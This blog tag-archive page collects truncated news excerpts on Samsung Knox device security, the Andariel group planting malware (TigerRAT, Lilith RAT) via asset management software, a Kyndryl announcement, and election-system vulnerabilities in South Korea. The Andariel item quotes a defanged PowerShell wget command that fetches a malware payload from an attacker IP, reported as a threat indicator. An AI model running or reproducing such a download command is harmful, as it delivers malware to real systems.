Tag Archive for: management

How Samsung Knox Suite enables best-in-class security and device management for financial services

/in


icon of a clockBy: Jeannine DeFoe

Security and compliance are common concerns for IT leaders in the financial services industry — but over the last few years, they’ve become top priorities, with businesses facing a significant spike in cybersecurity threats.

Given the rise of the hybrid workplace, mobile devices and tablets allow employees to stay connected, whether they are in the office, out in the field or meeting with customers. However, financial services companies are subject to a range of regulatory requirements around data protection and security on their devices. This puts extra pressure on financial firms to secure their data, enforce IT policies and protect those devices against malicious actors and threats.

Still, research shows that about 25% of malware attacks target financial services companies. In 2023, 64% of IT and cybersecurity professionals in the financial industry were hit by ransomware. With many financial workers now splitting their working days between the office, home and client visits, IT leaders and their teams are facing increased pressure to secure mobile devices regardless of where they are.

Samsung Knox, which is built into Samsung Galaxy mobile devices, tablets and wearables, protects business data for financial services and other regulated industries with government-grade protection. Samsung Knox offers mobile security, unified endpoint management, and fraud and theft protection to businesses. The platform is trusted for robust, government-grade security, with its defense starting at the hardware level and continuing to protect against the most advanced security threats.

Shop special offers

Find out about offers on the latest Samsung technology.


see deals

Speak to a solutions expert

Get expert advice from a solutions consultant.


Talk to an expert

Secure, deploy and manage data with Samsung Knox

IT leaders can use Samsung Knox Suite to manage various devices from a central location and a…

Source…

Hackers Exploit Asset Management Program to Deploy Malware

/in


The Andariel group has been identified in recent reports as distributing malware through asset management programs. This group has been previously discovered to be in a relationship with the Lazarus group.

The Andariel group is known to launch supply chain, spear phishing, or watering hole attacks as part of their initial access.

The group’s recent targets were Log4Shell and Innorix agents, which were targeted for attacking several corporate sectors in South Korea. In another case, the MS-SQL server was also identified to be targeted for malware attack. 

The malware used for attacks includes TigerRAT, NukeSped variants, Black RAT, and Lilith RAT. Similar to their previous attacks, their primary targets were South Korean communications companies and semiconductor manufacturers.

Document

Free Webinar

In the upcoming webinar, Karthik Krishnamoorthy, CTO and Vivek Gopalan, VP of Products at Indusface demonstrate how APIs could be hacked. The session will cover: an exploit of OWASP API Top 10 vulnerability, a brute force account take-over (ATO) attack on API, a DDoS attack on an API, how a WAAP could bolster security over an API gateway

Hackers Exploit Asset Management Program

Initial Access

In one case, an asset management program was targeted, which was identified with several logs.

This program was installed with Andariel group’s malware, which used the below PowerShell command for downloading the malware by using the mshta.exe process.

Powershell command used (Source: AhnLab)

PowerShell command: wget hxxp://109.248.150[.]147:8585/load.png -outfile C:\Users\public\credis.exe

Malware Used in Attacks

Some of the most used backdoors installed were TigerRAT, Black RAT, and NukeSped.

However, in recent attacks, an Open source malware named Lilith RAT was used. In other cases, malware developed in the Go language was also discovered. 

TigerRAT

This malware supports various features like uploading and downloading files, executing commands, collecting basic information, keylogging, taking screenshots, and port forwarding.

This backdoor has an authentication process during initial communications, making it different from other backdoors.

Golang Downloader

Source…

Kyndryl Introduces Experience Management as a Service to Help Customers Monitor, Measure and Achieve Business Outcomes IT Voice

/in








Kyndryl Introduces Experience Management as a Service to Help Customers Monitor, Measure and Achieve Business Outcomes IT Voice | IT in Depth

















































Go toTop









Source…

Fix security holes in election management

/in


North Korea can infiltrate South Korea’s internal network to manipulate voting results if it wants to, according to the National Intelligence Service’s (NIS) investigation of the National Election Commission (NEC). The finding on the NEC that oversees the process of presidential, parliamentary and local elections is shocking, especially ahead of next year’s parliamentary elections on April 10. In the worst possible scenario, the security loopholes in the election management system can prompt losers not to accept the results of the legislative election.

On Tuesday, the NIS announced the results of its investigation on the NEC’s election management system from July 17. It discovered a fault in the ballot opening procedure, which is crucial to the election outcome. Anyone could break into the NEC system by using a staffer’s password, which was, simply, “12345.”

The confusion in the early voting system was also confirmed to be serious. Hackers can easily break into the computer network from unauthorized outside systems, change early voters into nonvoters and manipulate the numbers to influence the final votes.

Stamping in early votes also could be easily exposed, as faking ballot cards was possible through printing tricks. A North Korean hacking group broke into the email box of an NEC employee in 2021, stole sensitive data, and leaked it to outside.

Whether North Korea succeeded in raiding South Korea’s election management system is unclear. The latest results should not be linked to raising questions on the outcome of the 2020 parliamentary elections and others. But the NEC must come up with appropriate measures to address its systemic vulnerabilities to North Korea’s hacking threat, especially ahead of the parliamentary election next April. The election management body must pay more heed to the early voting system due to the alarming findings in the previous legislative election. If quick fixes cannot be possible, authorities need to consider strengthening the firewall or streamlining the system.

The NEC retorted that voting results cannot be manipulated as they proceed publicly unless there is a large…

Source…